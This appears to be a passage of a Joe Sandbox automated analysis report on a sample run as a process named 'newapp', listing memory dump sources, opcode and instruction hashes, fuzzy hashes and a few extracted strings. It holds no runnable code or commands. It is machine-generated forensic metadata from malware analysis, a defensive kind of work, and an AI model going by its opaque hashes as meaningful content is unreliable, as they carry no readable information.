                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: fa776857277510f5fdf5e3824e95cc61db961ff7d5c343f81e6af58bb02ffcfe
                                                                                                                • Instruction ID: 87c5d59ff4cd9e1287f621c353f015d9f967afe3c5cdbdd103ffde9889a2e073
                                                                                                                • Opcode Fuzzy Hash: fa776857277510f5fdf5e3824e95cc61db961ff7d5c343f81e6af58bb02ffcfe
                                                                                                                • Instruction Fuzzy Hash: 3621AD71E102169FDB40CFB9E980AEEBBF5EB48710F048069E908E7355E735D9028B92
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000E.00000002.2957775861.00000000067F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067F0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_14_2_67f0000_newapp.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 00a38038faf66bacf688133ed70409b77f7155dea89ee9a86195500f842b346a
                                                                                                                • Instruction ID: 7b55421d7f41fd755214a4d6209b4339f978cfcb79dbe87d554be3eaf93de5a5
                                                                                                                • Opcode Fuzzy Hash: 00a38038faf66bacf688133ed70409b77f7155dea89ee9a86195500f842b346a
                                                                                                                • Instruction Fuzzy Hash: D221AE75F202199FDB40DF69E980AAEB7F1FB48710F108069EA08E7394E731D9018B92
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000E.00000002.2923871026.00000000010ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 010ED000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_14_2_10ed000_newapp.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 89a1cb8b093e554141e0546e942e8922ee8ada25a5637395e50e59ce9c6d3f3c
                                                                                                                • Instruction ID: 4e9fb00217c7bf5f02aee5ee1c6d1c71bb1dddb0875c1e0afbeb0dea2fd2de12
                                                                                                                • Opcode Fuzzy Hash: 89a1cb8b093e554141e0546e942e8922ee8ada25a5637395e50e59ce9c6d3f3c
                                                                                                                • Instruction Fuzzy Hash: BF215C711093C09FDB03CF64D994711BFB1EB46214F29C5DBD8898F2A7C23A985ACB62
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000E.00000002.2923871026.00000000010ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 010ED000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_14_2_10ed000_newapp.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 4a62017b12823f1964810235dd5b4ea5dd0e0cca908860391d50ab3912691577
                                                                                                                • Instruction ID: 268469d10e1714845c36987e6b7daae06a42ff18c284e9dbfba1b6504a2a00c1
                                                                                                                • Opcode Fuzzy Hash: 4a62017b12823f1964810235dd5b4ea5dd0e0cca908860391d50ab3912691577
                                                                                                                • Instruction Fuzzy Hash: DD212571504200DFCB15DF99D988B2ABFE5EB84314F28C5ADE9894B296C336D446CB61
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000E.00000002.2957775861.00000000067F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067F0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_14_2_67f0000_newapp.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: c7ee5abc82e62e65a823679b124899e86c537c7dd29378b024408edc96ad0caa
                                                                                                                • Instruction ID: a85bc6f181ee7fa6cbc2d4a0e2f3d48bf471bd2a23f2f5a27e179c4b87878f6c
                                                                                                                • Opcode Fuzzy Hash: c7ee5abc82e62e65a823679b124899e86c537c7dd29378b024408edc96ad0caa
                                                                                                                • Instruction Fuzzy Hash: 0221C371E102189BCB949F78C8419DEFBF5EB85320F148569E216EB300DA31D981CBE1
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000E.00000002.2957775861.00000000067F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067F0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_14_2_67f0000_newapp.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: a044a611ef810f93456c8dece2d427002724fba82f12ffa602d976833e268532
                                                                                                                • Instruction ID: 591df796ec92cd5541de3bc6c96dd712f0b78b5714fccc84ed54e56953e5a869
                                                                                                                • Opcode Fuzzy Hash: a044a611ef810f93456c8dece2d427002724fba82f12ffa602d976833e268532
                                                                                                                • Instruction Fuzzy Hash: 6D11E531B202011BDB659B3C9810FAFBBDBDFC6620F24442AE309DB35ADD61CC424396
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000E.00000002.2957775861.00000000067F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067F0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_14_2_67f0000_newapp.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 5650fdffcee7268f9553f2df5acfda0837c4287316bfef63afda1c66bb3c655f
                                                                                                                • Instruction ID: 10a2442eb1a969d57e9ac77f3e9241da56d5bff15e2ed52621c50525bca1b56a
                                                                                                                • Opcode Fuzzy Hash: 5650fdffcee7268f9553f2df5acfda0837c4287316bfef63afda1c66bb3c655f
                                                                                                                • Instruction Fuzzy Hash: 45012835B205410FCB65977CA450B7E7BDACBC9220F14883AE20ACB351EE16DC434392
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000E.00000002.2957775861.00000000067F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067F0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_14_2_67f0000_newapp.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 17019209eeda1f07bfde51b186b5f71815e6b125c7b6e890ef94d4029aae4336
                                                                                                                • Instruction ID: 955508e51694d5f265eb0be7cb02657aa4534e7294e50dce9823193e1fb56a28
                                                                                                                • Opcode Fuzzy Hash: 17019209eeda1f07bfde51b186b5f71815e6b125c7b6e890ef94d4029aae4336
                                                                                                                • Instruction Fuzzy Hash: E8118E31B241289FDB449668D814AAF73EAABC9214F00843AC60AE7344EF659C028BD2
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000E.00000002.2957775861.00000000067F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067F0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_14_2_67f0000_newapp.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: a96b8ae126ed360ec64b90c107b05f0b127a8322d2ed01f827febc7bc190f9ca
                                                                                                                • Instruction ID: c2b3daf8564d6eba7bbff82dd93e0c42856b26e777f4ba022d7076317be9e989
                                                                                                                • Opcode Fuzzy Hash: a96b8ae126ed360ec64b90c107b05f0b127a8322d2ed01f827febc7bc190f9ca
                                                                                                                • Instruction Fuzzy Hash: 6801D232B241245BEB649B689C10AFFB3EA9BC5654F00407AD709E7349DE61980647D2
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000E.00000002.2957775861.00000000067F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067F0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_14_2_67f0000_newapp.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 8c4c584815e5c6ed2b1a98544cd6d4f43ce213770715f5314ebf1e8d0e596d66
                                                                                                                • Instruction ID: bd3ecdc41059cd0311fc184f30f1ec8cfb52a3c8d2410a61a37449fc644ca474
                                                                                                                • Opcode Fuzzy Hash: 8c4c584815e5c6ed2b1a98544cd6d4f43ce213770715f5314ebf1e8d0e596d66
                                                                                                                • Instruction Fuzzy Hash: EB21C4B5D01259AFCB10DF9AD985ADEFFB4FB49320F50812AE918A7200C374A954CFE5
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000E.00000002.2957775861.00000000067F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067F0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_14_2_67f0000_newapp.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 20d55e5688249aef6a120f08b5dd4eb1958d695ffcf5cdbd072a0728a4bd7f1e
                                                                                                                • Instruction ID: 9ac3e8431f442e324a3e22900c62cb74fb11ed760715b7d24a25a35e0fcadea8
                                                                                                                • Opcode Fuzzy Hash: 20d55e5688249aef6a120f08b5dd4eb1958d695ffcf5cdbd072a0728a4bd7f1e
                                                                                                                • Instruction Fuzzy Hash: 4A21C0B1D01219AFDB00DF9AD884ADEFFB4FB49324F10812AE918A7300C374A954CBE5
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000E.00000002.2957775861.00000000067F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067F0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_14_2_67f0000_newapp.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: b0309c0524ae36298d2bacc60d6d4ff392ecc0e45303844e4110c7fed24f7bcc
                                                                                                                • Instruction ID: 06e62d9de111e5196a8a321b7e53a66c74593168bf49efab6c084a1f3e63f1c1
                                                                                                                • Opcode Fuzzy Hash: b0309c0524ae36298d2bacc60d6d4ff392ecc0e45303844e4110c7fed24f7bcc
                                                                                                                • Instruction Fuzzy Hash: F601D830B101108FC751DB7CA464B7ABBEADB8A614F14C57AE64ECB355DD21DC4287A1
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000E.00000002.2957775861.00000000067F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067F0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_14_2_67f0000_newapp.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 6368b3346cd61ae35720fe9a08cdd73c089e91d0dba86d1ef1257879b5a64403
                                                                                                                • Instruction ID: 7c3709d77cfcbb8c028827e102b2f388daccd46605ae73b98bd625f4a435a42c
                                                                                                                • Opcode Fuzzy Hash: 6368b3346cd61ae35720fe9a08cdd73c089e91d0dba86d1ef1257879b5a64403
                                                                                                                • Instruction Fuzzy Hash: C701DC30B101111BDB649A7DA810B2FA3DBDFC9B10F24883AE20EDB34AED61DC424796
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000E.00000002.2957775861.00000000067F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067F0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_14_2_67f0000_newapp.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: a35b2639adb7d00580d57d189e85ea10b56273e54896d2cd7c4d9fcb133e2b52
                                                                                                                • Instruction ID: 47038d248e1b1ac5b752eb3ea8fc0405777eaeabd480fd6507f6140c88aca51b
                                                                                                                • Opcode Fuzzy Hash: a35b2639adb7d00580d57d189e85ea10b56273e54896d2cd7c4d9fcb133e2b52
                                                                                                                • Instruction Fuzzy Hash: 7D01A435B205111BDB64D67DA450B3EA7DBDBC9620F148439E20ECB340EE26DC434386
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000E.00000002.2957775861.00000000067F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067F0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_14_2_67f0000_newapp.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: be806abc290bc27a523c83a8b41fc3b31dce4b13e702ffd3b77873712102c7ed
                                                                                                                • Instruction ID: e78b61f39e910f4d60f5bf5af1228498d81386c1582434b082b59ab198c02742
                                                                                                                • Opcode Fuzzy Hash: be806abc290bc27a523c83a8b41fc3b31dce4b13e702ffd3b77873712102c7ed
                                                                                                                • Instruction Fuzzy Hash: A701A430B100118FCB60EB3CE564B3AB7DADB89714F148539E60ECB358EE21DC428795
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000E.00000002.2957775861.00000000067F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067F0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_14_2_67f0000_newapp.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 85c34ec3ece761b4e58036865740c1201d0e19e3ef2f913c4356344e45a1b8b1
                                                                                                                • Instruction ID: 49a3e0fc6a18779e573af76db15ec629d02bb9814cb2d6e6c466cc0eee6af18a
                                                                                                                • Opcode Fuzzy Hash: 85c34ec3ece761b4e58036865740c1201d0e19e3ef2f913c4356344e45a1b8b1
                                                                                                                • Instruction Fuzzy Hash: BA01D621A4D3811FC76293789814B9ABFA45F82210F0941EBD444CF2A7EE28D908C7E6
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000E.00000002.2957775861.00000000067F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067F0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_14_2_67f0000_newapp.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 0f56897bc9a4cb0862300eea213d915e9df7a916ed80df9b1200c2a0c9aa94d6
                                                                                                                • Instruction ID: 00fea4f49d684cdac53760e8c752520f48518f3483bd7021dbf261128515c81e
                                                                                                                • Opcode Fuzzy Hash: 0f56897bc9a4cb0862300eea213d915e9df7a916ed80df9b1200c2a0c9aa94d6
                                                                                                                • Instruction Fuzzy Hash: 9AE0E531E403151BCB94A37DD900AAFEBD9DF80660F004634E5188B358EF29ED098BD0
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000E.00000002.2957775861.00000000067F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067F0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_14_2_67f0000_newapp.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: a23a93a407104cf785f258938e154d0cf7862e52e064357e99cd0ba6bb6d5708
                                                                                                                • Instruction ID: 6913ceacee5d857899a05f060f03011cc85058431efed0f1d13d1d3291ba0f85
                                                                                                                • Opcode Fuzzy Hash: a23a93a407104cf785f258938e154d0cf7862e52e064357e99cd0ba6bb6d5708
                                                                                                                • Instruction Fuzzy Hash: E3F0E571D25608AFCB50DFB48A41AAAFBBCEB43214F118491D508EB202E232EE5087D1
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000E.00000002.2957775861.00000000067F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067F0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_14_2_67f0000_newapp.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: $^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
                                                                                                                • API String ID: 0-2222239885
                                                                                                                • Opcode ID: e008f61405e384ca7600b9e54b61412752465b2cb1413740a0fabd17b21e0c39
                                                                                                                • Instruction ID: b95f599f098df829248300fc397526ef47bf2e4528898d7469e1d90d37cb841e
                                                                                                                • Opcode Fuzzy Hash: e008f61405e384ca7600b9e54b61412752465b2cb1413740a0fabd17b21e0c39
                                                                                                                • Instruction Fuzzy Hash: BF122C30E10219CFDB68DF69D954AAEB7F2BF88304F2085A9D509AB354DB309D85CF81
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000E.00000002.2957775861.00000000067F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067F0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_14_2_67f0000_newapp.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: $^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
                                                                                                                • API String ID: 0-3823777903
                                                                                                                • Opcode ID: 1ce4084cb2009d0aa1758bcf2f1d825f91174ecfce4d112c46bc9f31a1465532
                                                                                                                • Instruction ID: f9857659c8d5988e02cb66142473fd6bc4ca4ce849575a417836a39cd1d679ca
                                                                                                                • Opcode Fuzzy Hash: 1ce4084cb2009d0aa1758bcf2f1d825f91174ecfce4d112c46bc9f31a1465532
                                                                                                                • Instruction Fuzzy Hash: 98916D30E20209DFDB68EF64D554B7EB7F2AF84304F208929E5099B358DB749945CB90
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000E.00000002.2957775861.00000000067F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067F0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_14_2_67f0000_newapp.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: .5vq$$^q$$^q$$^q$$^q$$^q$$^q
                                                                                                                • API String ID: 0-390881366
                                                                                                                • Opcode ID: b6bc7c70c73d493c3794abac27cbcfd31c28eb8005eb9febb8053aeaabfa9c8c
                                                                                                                • Instruction ID: 96cce3fcdaf6e8889f90060fc206149c47a10796f25758ab6785d07343ebae1d
                                                                                                                • Opcode Fuzzy Hash: b6bc7c70c73d493c3794abac27cbcfd31c28eb8005eb9febb8053aeaabfa9c8c
                                                                                                                • Instruction Fuzzy Hash: 26F14D30A10219CFDB58EF68D594A6EB7B3FF88304F608529D4069B769DB31EC46CB91
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000E.00000002.2957775861.00000000067F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067F0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_14_2_67f0000_newapp.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: $^q$$^q$$^q$$^q
                                                                                                                • API String ID: 0-2125118731
                                                                                                                • Opcode ID: dcfd24338462a1ee37966c09ddce1af736f7ab398231c11179f3e761b85ef868
                                                                                                                • Instruction ID: 448e833e6bf04032ff59464b7df01236d7d545c72b70b367c242c272df8eb324
                                                                                                                • Opcode Fuzzy Hash: dcfd24338462a1ee37966c09ddce1af736f7ab398231c11179f3e761b85ef868
                                                                                                                • Instruction Fuzzy Hash: 84B14D30E20219CFDB54EF68C594AAEB7B2FF84304F248929D5069B359DB35DC86CB81
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000E.00000002.2957775861.00000000067F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067F0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_14_2_67f0000_newapp.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: LR^q$LR^q$$^q$$^q
                                                                                                                • API String ID: 0-2454687669
                                                                                                                • Opcode ID: 084e46bf7dd06cfc225c1b8bb674c1b49f7344f9c2eaf8615b9829e9d9815fdd
                                                                                                                • Instruction ID: ad3e1448a9a7be828cb35e74fe9eef26a590cc3b3941f3294ba258c4478583d0
                                                                                                                • Opcode Fuzzy Hash: 084e46bf7dd06cfc225c1b8bb674c1b49f7344f9c2eaf8615b9829e9d9815fdd
                                                                                                                • Instruction Fuzzy Hash: 8451A230B102018FDB58DB28D950E7AB7F6FF88304F148969E5059B3A9EE31EC45CB92
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000E.00000002.2957775861.00000000067F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067F0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_14_2_67f0000_newapp.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: $^q$$^q$$^q$$^q
                                                                                                                • API String ID: 0-2125118731
                                                                                                                • Opcode ID: 307ed5969931fab18f397ca70afbe7734e8c5ac14c9a26765d76274c49e5520a
                                                                                                                • Instruction ID: c8ac0865d2131a7f962ebf431c84a152aa3ddc88b29c09a0f97e6e358b88c506
                                                                                                                • Opcode Fuzzy Hash: 307ed5969931fab18f397ca70afbe7734e8c5ac14c9a26765d76274c49e5520a
                                                                                                                • Instruction Fuzzy Hash: EE516E30A20204CFDFA5DB68D580ABEB7F2EB88310F148529D50A9B354DB31DC46CF91